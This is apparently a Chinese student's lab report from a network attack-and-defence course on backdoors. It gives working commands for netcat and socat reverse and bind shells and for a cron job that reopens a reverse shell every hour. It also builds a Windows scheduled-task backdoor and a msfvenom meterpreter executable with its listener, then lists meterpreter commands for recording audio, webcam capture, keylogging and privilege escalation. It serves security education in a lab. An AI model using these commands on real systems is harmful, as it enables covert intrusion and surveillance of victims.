2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

• 下载自己不熟悉的软件时含有病毒。
• 网络钓鱼，自己的隐私被泄露遭到社会工程学攻击然后进入了会自动下载插件的网址。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

• 计算机病毒课上讲过可以修改win注册表项造成开机自启动。
• 或者更换图标使用户误认为是需要运行的文件，造成启动。

(3)Meterpreter有哪些给你映像深刻的功能？

• 拍照和录音我认为是最深刻的，拍照可以得知用户所进行的活动，录音可以窃取隐私信息或者用在采取证据上。
  (4)如何发现自己有系统有没有被安装后门？

• 及时用杀软对电脑进行扫描。

• 调用有关工具观察是否有不认识的文件、陌生的进程、未知的开放端口，若发现不正常的踪迹及时清理。

---

netcat熟悉

一、win10 获取 linux 的shell

1.首先在win10开启监听ncat.exe -l -p 5336

2.Linux反弹连接win10 nc 192.168.1.223 5336 -e /bin/sh此处IP为win10的ip

二、linux 获取 win10 的shell

1.首先在linux开启监听nc -l -p 5336

2.win10反弹连接linux ncat.exe -e cmd.exe 192.168.1.163 5336此处IP为linux的ip

三、nc传输数据

1.Windows下监听5336端口ncat.exe -l 5336
Kali下连接到Windows的5336端口nc 192.168.1.223 5336

四、nc传文件

1.Windows下监听5336端口，并把收到的数据保存到20165336fromkali.txt中ncat.exe -l 5336 > 20165336fromkali.txt

2.kali反弹连接到Windows的5336端口nc 192.168.1.223 5318 < 20165336.txt

---

实验内容

任务一：使用netcat获取主机操作Shell，cron启动

1.在windows下监听ncat.exe -l 5336
2.在Kali环境下用crontab -e指令编辑一条定时任务，选择基本的vim编辑器
3.在最后一行添加57 * * * * /bin/netcat 192.168.1.223 5336 -e /bin/sh，意思是在每个小时的第57分钟反向连接Windows主机的5336端口,因为做实验的时候快57分了所以定得57.

任务二：使用socat获取主机操作Shell, 任务计划启动

1.在Windows10系统下，打开计算机管理，创建任务，填写任务名称后20165336，新建一个触发器,设为工作站锁定时。

2.在编辑操作中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5336 exec:cmd.exe,pty,stderr，这个命令的作用是把cmd.exe绑定到端口5336，同时把cmd.exe的stderr重定向到stdout上：

3.win+L或者右键运行，然后用kali输入socat - tcp:192.168.1.223:5336 获得成功

• 遇到的问题
  虽然不影响实验得结果，但在过程中每当win+L或者右键运行时都会弹出如下图错误，网上查找原因大概是因为版本的原因，需要修改环境变量，和升级软件因为怕把机子搞出故障所有没有继续解决，希望跟同学交流后能够有更好的解决办法。

任务三：使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.通过在linux中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.163 LPORT=5336 -f exe > 20165336_backdoor.exe，IP地址为LinuxIP，生成了后门程序20165336_backdoor.exe

2.在win10中监听ncat.exe -l 5336 > 20165336_backdoor.exe

3.在Linux中输入nc 192.168.1.223 5336 < 20165336_backdoor.exe，注意这里的IP为WindowsIP

4.使用msfconsole指令进入msf控制台

5.输入use exploit/multi/handler使用监听模块，设置payload;set payload windows/meterpreter/reverse_tcp，使用和生成后门程序时相同的payload,set LHOST 192.168.1.163，这里用的是LinuxIP，和生成后门程序时指定的IP相同set LPORT 5336，同样要使用相同的端口

6.执行监听exploit，在win10上运行后门程序，并且在kali得到了远程控制的shell

任务四：使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• record_mic指令可以截获一段音频

• webcam_snap指令可以使用摄像头拍照
• keyscan_start指令记录下击键的过程，使用keyscan_dump指令读取击键的记录

• screenshot指令可以进行截屏
  

• getuid指令查看当前用户

• getsystem指令进行提权

---

遇到的问题

做实验时很关键一点就是关掉虚拟机和win10的防火墙和杀毒软件，如果没有关完全换来的就是无尽的折磨，实验因为这个做不出来搞得人怪难受的。

心得体会

• 这次实验内容很有意思，让我熟悉掌握了netcat、socat，尤其是MSFmeterpreter感觉如果学通了应该会很厉害，对于能窥别人摄像头和录音我认为还是蛮有趣的，过程中还是遇到了一些问题，通过跟同学的探讨最终完成了实验，总的来说收获满满，并且感觉在乐趣中做实验受益匪浅。